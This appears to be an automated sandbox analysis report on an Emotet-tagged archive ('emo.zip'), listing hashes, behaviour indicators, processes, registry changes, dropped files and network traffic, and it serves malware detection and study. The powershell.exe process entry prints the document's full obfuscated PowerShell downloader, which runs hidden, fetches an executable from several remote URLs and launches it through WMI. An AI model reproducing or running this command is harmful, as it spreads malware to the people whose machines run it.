File name:

emo.zip

Full analysis: https://app.any.run/tasks/83defc93-1dc9-4f5b-b749-57cec6242d0b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 15, 2024, 20:33:09
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

90B109613C490CD016AD5A3E81391262

SHA1:

6B3B85895CA5338B09CAB0BE9373FB3B3D8ECA69

SHA256:

3F225FBA4F95616CA4EEEBF19F0AD0E888A408346E1B38414FEA9809E77EF579

SSDEEP:

3072:g8i+3dbMz73Hu8v9TTi4BI/yA4Pl2aC/eXd:xi+Nb273u8v9TPSYUJGXd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 5960)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7016)
  • SUSPICIOUS

    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 6564)
    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Executed via WMI

      • powershell.exe (PID: 7016)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Unusual connection from system programs

      • powershell.exe (PID: 7016)
    • Reads security settings of Internet Explorer

      • TextInputHost.exe (PID: 4080)
    • The process executes via Task Scheduler

      • UCPDMgr.exe (PID: 4428)
  • INFO

    • Manual execution by a user

      • WINWORD.EXE (PID: 6564)
    • Reads mouse settings

      • WINWORD.EXE (PID: 6564)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 7016)
    • Create files in a temporary directory

      • powershell.exe (PID: 7016)
    • Reads the software policy settings

      • powershell.exe (PID: 7016)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Checks proxy server information

      • powershell.exe (PID: 7016)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7016)
    • Reads the computer name

      • TextInputHost.exe (PID: 4080)
    • Checks supported languages

      • TextInputHost.exe (PID: 4080)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x000b
ZipCompression: Deflated
ZipModifyDate: 2020:11:02 18:14:28
ZipCRC: 0x964ff0d0
ZipCompressedSize: 99325
ZipUncompressedSize: 210432
ZipFileName: emo.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
149
Monitored processes
11
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs rundll32.exe no specs winword.exe powershell.exe conhost.exe no specs ai.exe no specs filecoauth.exe no specs filecoauth.exe no specs textinputhost.exe no specs ucpdmgr.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
4080"C:\WINDOWS\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mcaC:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Version:
123.26505.0.0
Modules
Images
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\textinputhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\vcruntime140_app.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
4428"C:\WINDOWS\system32\UCPDMgr.exe"C:\Windows\System32\UCPDMgr.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
User Choice Protection Manager
Exit code:
0
Version:
1.0.0.414301
Modules
Images
c:\windows\system32\ucpdmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4640\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeUCPDMgr.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5960"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\emo.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
6236C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
6512C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
6560C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
6564"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\emo\emo.doc" /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7016POwersheLL -windowstyle hidden -ENCOD   S V     0 z X   ( [ T y P e ] ( " { 2 } { 0 } { 4 } { 3 } { 1 } " - f   ' e ' , ' r E C t o r Y ' , ' s Y s t ' , ' . I O . d I ' , ' M ' )     )   ;       s e t     T x y S e o     (     [ T Y p e ] ( " { 0 } { 7 } { 5 } { 6 } { 4 } { 2 } { 1 } { 8 } { 3 } " - F ' S Y s T E ' , ' T M ' , ' I N ' , ' E R ' , ' p O ' , ' N e T . s e ' , ' R V I C E ' , ' M . ' , ' A N a G ' ) )   ;     $ N b f 5 t g 3 = ( ' B 9 ' + ' y p ' + ( ' 9 0 ' + ' s ' ) ) ; $ V x n l r e 0 = $ C l u d k j x   +   [ c h a r ] ( 6 4 )   +   $ R 6 r 1 t u y ; $ K y 3 q 0 e 8 = ( ( ' R q ' + ' d x ' ) + ' w o ' + ' 5 ' ) ;     (     D i r     v a R i A b l e : 0 Z x ) . v a l u E : : " C r e A T ` E ` d I R E c ` T ` O r Y " ( $ H O M E   +   ( ( ( ' n D p ' + ' J r b ' ) + ( ' e ' + ' v k 4 n ' ) + ' D ' + ' p ' + ( ' C ' + ' c w r _ 2 h ' ) + ' n D ' + ' p ' )   - R e P l A c E   ( ' n ' + ' D p ' ) , [ c H a R ] 9 2 ) ) ; $ F N 5 g g m s H   =   ( 1 8 2 , 1 8 7 , 2 2 9 , 1 4 6 , 2 3 1 , 1 7 7 , 1 5 1 , 1 4 9 , 1 6 6 ) ; $ P y o z g e o = ( ( ' J 5 f ' + ' y 1 ' ) + ' c ' + ' c ' ) ;   (     v a R i A B L E   T x Y S E o     ) . V a l u E : : " S e c U r I ` T Y p ` R ` O t O c ` o l "   =   ( ( ' T l ' + ' s 1 ' ) + ' 2 ' ) ; $ F N 5 g g m s H   + =   ( 1 8 6 , 1 4 1 , 2 2 8 , 1 8 2 , 1 7 7 , 1 7 1 , 2 2 9 , 2 3 6 , 2 3 9 , 2 3 9 , 2 3 9 , 2 2 8 , 1 8 1 , 1 8 2 , 1 7 1 , 2 2 9 , 2 3 4 , 2 3 9 , 2 3 9 , 2 2 8 ) ; $ H u a j g b 0 = ( ( ' J n ' + ' o ' ) + ' 5 g ' + ' a 1 ' ) ; $ B b 2 8 u m o   =   ( ( ' A l e ' + ' 7 g ' ) + ' _ 8 ' ) ; $ H s c e _ j s = ( ' K v ' + ( ' n b ' + ' o v _ ' ) ) ; $ S p k 5 1 u e = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ S c u s b k j = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . e ' + ' x ' ) + ' e ' ) ; $ F N 5 g g m s H   + =   ( 1 8 5 , 1 7 9 , 1 9 0 , 1 8 4 , 2 2 9 , 1 5 1 , 1 3 9 , 1 5 7 , 1 6 4 , 2 3 5 , 1 7 7 , 2 3 9 , 1 7 1 , 1 8 3 , 2 3 6 , 1 4 1 , 1 2 8 , 1 8 7 , 2 3 5 , 1 3 4 , 1 2 8 , 1 5 8 , 1 7 7 , 1 7 6 , 1 3 9 ) ; $ h b m s k V 2 T = ( ( ' C ' + ' 7 x o ' ) + ' 9 g ' + ' l ' ) ; $ h b m s k V 2 T = $ H O M E + ( ( ' 5 ' + ' t ' + ( ' f ' + ' J r b e v ' + ' k ' ) + ( ' 4 5 t f ' + ' C c ' + ' w ' ) + ' r ' + ( ' _ 2 h ' + ' 5 t f ' ) )   - r E p l A C E     ( [ C h A R ] 5 3 + [ C h A R ] 1 1 6 + [ C h A R ] 1 0 2 ) , [ C h A R ] 9 2 ) + $ B b 2 8 u m o + ( ( ' . c ' + ' o ' ) + ' n f ' ) ; $ Q 1 _ y 0 5 _ = ( ' W ' + ( ' 4 ' + ' q v y ' ) + ' z 8 ' ) ; $ O d b 3 h f 3 = & ( ' n ' + ' e ' + ' w - o b j e c t ' )   N e t . W E B c l I E N t ; $ F N 5 g g m s H   + =   ( 1 8 3 , 1 5 4 , 1 7 3 , 1 2 8 , 1 7 5 , 1 5 1 , 2 3 8 , 1 4 0 , 1 8 3 , 1 6 2 , 2 2 8 , 1 7 0 , 1 7 3 , 1 7 9 , 2 2 9 ) ; $ A n b y t 1 y = ( ' h ' + ( ' t t p : ' + ' ] [ ' + ' ( s ) ] ' ) + ( ( ' w ] ' + ' [ ( ' ) ) + ( ( ' s ) ' + ' ] w ' ) ) + ( ' d a ' + ' - ' ) + ' i ' + ' n ' + ' d u ' + ( ' s ' + ' t r i a l . ' + ' h ' + ' t ' ) + ' b ] ' + ( ' [ ( s ) ] ' + ' w ' + ' j s ' ) + ( ( ' ] ' + ' [ ( ' ) ) + ( ( ' s ' + ' ) ] w 9 I d L ' + ' P ] [ ' + ' ( s ' + ' ) ] w ' + ' @ h ' ) ) + ( ' t ' + ' t p : ] ' ) + ( ' [ ( s ' + ' ) ] ' ) + ' w ' + ( ' ] ' + ' [ ( s ) ] ' ) + ( ' w d a p ' + ' r o ' + ' f e s i o n a ' + ' l . h ' ) + ' t b ' + ( ' ] [ ( s ' + ' ) ' + ' ] ' ) + ' w ' + ( ' d ' + ' a t a ' ) + ( ' 4 ] [ ( s ' + ' ) ] w h ' ) + ( ' W g W ' + ' j T ' ) + ( ' V ] ' + ' [ ' ) + ( ' ( s ) ] w @ h t t p ' + ' s : ] [ ( s ' + ' ) ] ' + ' w ' + ' ] ' ) + ' [ ' + ( ' ( s ) ' + ' ] w d a g ' + ' r a ' ) + ' n i ' + ' t ' + ( ' e g ' + ' i a ' ) + ( ' r e . h ' + ' t ' ) + ' b ] ' + ( ' [ ' + ' ( s ) ' ) + ( ' ] w w ' + ' p - a ' + ' d m ' + ' i n ] [ ( s ) ' + ' ] w t ' ) + ( ' V ] [ ' + ' ( s ' + ' ) ' ) + ( ' ] w @ ' + ' h ' ) + ' t t ' + ' p ' + ( ' : ' + ' ] [ ' ) + ( ' ( s ) ] w ] [ ' + ' ( s ' + ' ) ] w w w ' + ' w ' + ' . o u t ' + ' s ' + ' p ' ) + ( ' o k ' + ' e ' ) + ' n v ' + ' i ' + ( ' s ' + ' i o n s . ' ) + ( ' h t b ' + ' ] ' ) + ' [ ' + ( ' ( s ) ] w ' + ' w p ' + ' - i n ' ) + ( ' c l u ' + ' d ' ) + ( ' e s ] [ ( s ) ' + ' ] w a W ' + ' o ' + ' M ' ) + ( ' ] ' + ' [ ( ' + ' s ) ] w ' ) + ( ' @ ' + ' h t t p : ] ' ) + ( ' [ ( s ) ' + ' ] w ] [ ( ' + ' s ) ' ) + ( ' ] w m o ' + ' b s ' ) + ( ' o ' + ' u k . h ' ) + ( ( ' t ' + ' b ] [ ( ' ) ) + ( ( ' s ) ' + ' ] w w p - ' ) ) + ' i n ' + ' c ' + ' l ' + ( ' u d e ' + ' s ] ' + ' [ ' ) + ( ' ( s ) ] ' + ' w ' ) + ( ' U Y ' + ' 3 0 R ] ' ) + ( ' [ ( s ' + ' ) ] w ' + ' @ ' + ' h ' + ' t t p : ] [ ' ) + ( ' ( ' + ' s ) ] w ' ) + ( ' ] [ ' + ' ( s ) ' ) + ( ' ] ' + ' w b ' ) + ' i ' + ( ' g ' + ' l a u g h ' + ' s ' ) + ( ( ' . h ' + ' t ' + ' b ] [ ( s ' ) ) + ( ( ' ) ] ' ) ) + ( ' w s ' + ' m a l l p o t ' + ' a t o ' ) + ' e s ' + ( ( ' ] ' + ' [ ( s ' ) ) + ( ( ' ) ] w Y ] ' + ' [ ( s ' + ' ) ] w ' + ' @ h ' + ' t t p s : ] [ ( s ) ' ) ) + ' ] w ' + ( ' ] [ ( ' + ' s ) ] w n ' + ' g ' ) + ( ' l l ' + ' o ' ) + ( ' g i s t ' + ' i ' ) + ( ' c s . ' + ' h ' ) + ' t ' + ( ' b ] ' + ' [ ' + ' ( ' + ' s ) ] w ' ) + ' a d ' + ( ' m i ' + ' n ' ) + ' e r ' + ' ] ' + ( ' [ ( s ' + ' ) ] w ' + ' W 3 m ' ) + ' k ' + ( ( ' B ' + ' ] [ ( s ' ) ) + ( ( ' ) ' + ' ] w ' ) ) ) . " r e p ` L A c E " ( ( ' ] ' + ' [ ' + ( ' ( s ) ] ' + ' w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x w ' + ' e ' ) ) [ 0 ] ) . " s P ` l I T " ( $ I v g 3 z c u   +   $ V x n l r e 0   +   $ J z a e w d y ) ; $ G c o y v l v = ( ( ' K f ' + ' _ ' ) + ( ' 9 ' + ' e t 1 ' ) ) ; f o r e a c h   ( $ A 8 i 3 k e 1   i n   $ A n b y t 1 y ) { t r y { $ O d b 3 h f 3 . " d O ` W n L O A ` d f I L e " ( $ A 8 i 3 k e 1 ,   $ S c u s b k j ) ; $ Z h c n a u x = ( ( ' E k ' + ' k ' ) + ( ' j ' + ' 4 7 t ' ) ) ; I f   ( ( & ( ' G e t - I ' + ' t e ' + ' m ' )   $ S c u s b k j ) . " L E n ` G T h "   - g e   4 5 1 9 9 )   { $ { A 8 ` I ` 3 K E 1 } . ( " { 1 } { 2 } { 0 } "   - f ' a y ' , ' T o C h a ' , ' r A r r ' ) . I n v o k e ( )   |   . ( " { 2 } { 1 } { 0 } { 3 } "   - f ' - ' , ' a c h ' , ' F o r E ' , ' O b j e c t ' )   - p r o c e s s   {   $ { F N 5 ` G G m ` S h }   + =   ( [ b y t e ] [ c h a r ] $ { _ }   - b x o r   0 x d f   )   } ;   $ F N 5 g g m s H   + =   ( 2 2 8 ) ;   $ b 0 R j e   =     [ t y p e ] ( " { 1 } { 0 } "   - F ' V e r T ' , ' C o n ' ) ;       $ B 0 R j E : : " t O ` B a S ` E 6 4 S ` T R I ` N g " ( $ { f n 5 ` g g m ` s h } )   |   . ( " { 2 } { 1 } { 0 } "   - f   ' i l e ' , ' u t - f ' , ' o ' )   $ { h B ` m S K ` V 2 T } ;   ( [ w m i c l a s s ] ( ( ' w i ' + ' n ' ) + ( ' 3 2 _ ' + ' P r o c ' + ' e ' ) + ' s ' + ' s ' ) ) . " c R ` e a T E " ( $ S c u s b k j ) ; $ G l w k i 6 a = ( ' I ' + ' m ' + ( ' t d ' + ' x v 6 ' ) ) ; b r e a k ; $ P f p b l h 1 = ( ' V s ' + ( ' l a l ' + ' c ' ) + ' u ' ) } } c a t c h { } } $ F 4 7 i e f 2 = ( ( ' B n ' + ' z i d ' ) + ' r t ' )  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7028\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
29 701
Read events
29 187
Write events
461
Delete events
53

Modification events

(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\emo.zip
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(5960) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E
Operation:writeName:@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\oregres.dll,-120
Value:
Microsoft Word 97 - 2003 Document
(PID) Process:(5960) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:writeName:0
Value:
C:\Users\admin\Desktop\emo
Executable files
10
Suspicious files
133
Text files
42
Unknown types
1

Dropped files

PID
Process
Filename
Type
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\Anonymous\floodgatecampaigns.json
MD5:
SHA256:
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:B38D23E0A572C34B1836EAB6340D134C
SHA256:BE0A76A777F7221A420D1B597171C9837A64873B5C2BD824A49D653924389EBF
6564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:3310F22AE8C19A2CD2544184A975327F
SHA256:687CC7FD71B662E6B10BF7E6D6DB790F23CB1510353E4935E2C054643B54C19F
6564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_39.ttfbinary
MD5:1BE236301B686323302632C0EACCFD6F
SHA256:90200D640623BFB0518B18D72C3F9828BC6EDA63EAB2DA90FBC27A08AAD165D7
6564WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64Abinary
MD5:9E40B894A10A87FC31B3D82C7622081A
SHA256:1D578B895886D6621CB8990D52318A0587BDE0F86EE905D037E42B31DB80C8E1
6564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:A7022C1B6DCAADAC50685DCA8B8AB1F2
SHA256:ACBCC93B197FFFBEAEB0FD18C1913147C50F57E3E5949D37973B496C4DE55A81
6564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\emo.doc.LNKbinary
MD5:47E633D77415283D9B25528969F486B1
SHA256:901F335E7528ADA9D6E0A4C6B379FAC9B1006881DB054EE6163964B6C5C1185C
7016powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a03cexaf.tbk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6564WINWORD.EXEC:\Users\admin\Desktop\emo\~$emo.docbinary
MD5:B95667FF3690A6DF77AE5EA468FAA23F
SHA256:3693EEAA9F988DFB8C867F0D384951ACFDE95BD7CA4678E42E10A1D5B6181720
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
149
DNS requests
42
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5548
svchost.exe
GET
200
23.45.176.171:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
6564
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
unknown
5548
svchost.exe
GET
200
2.21.17.194:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
920
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
6976
SIHClient.exe
GET
200
2.21.17.194:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
6976
SIHClient.exe
GET
200
2.21.17.194:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
4996
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
6564
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
6564
WINWORD.EXE
GET
200
23.45.176.171:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
unknown
6564
WINWORD.EXE
GET
200
23.45.176.171:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4364
svchost.exe
239.255.255.250:1900
unknown
4
System
192.168.100.255:137
whitelisted
5548
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4080
RUXIMICS.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5140
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5548
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5548
svchost.exe
23.45.176.171:80
crl.microsoft.com
Akamai International B.V.
US
unknown
5548
svchost.exe
2.21.17.194:80
www.microsoft.com
AKAMAI-AS
BE
unknown
920
svchost.exe
20.190.159.68:443
login.live.com
